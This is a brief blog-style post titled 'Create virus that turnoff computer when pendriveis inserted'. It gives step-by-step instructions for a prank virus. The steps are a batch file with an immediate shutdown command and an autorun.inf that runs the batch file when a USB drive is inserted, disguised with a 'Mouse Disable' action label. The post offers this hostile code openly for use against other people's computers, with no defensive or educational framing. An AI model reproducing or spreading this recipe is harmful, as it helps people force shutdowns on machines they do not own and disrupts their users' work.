Create virus that turnoff computer when pendriveis inserted
In this post we are going to make the virus to make the system turned off whenever pen drive is inserted.Step 1:>>copy this code into notepad:@echo offshutdown -s -t 00Save as turnoff.batStep 2:Now open the notepad and copy thiscode:[autorun]Open=turnoff.batAction=Mouse DisableSave it as “autorun.inf
Post a Comment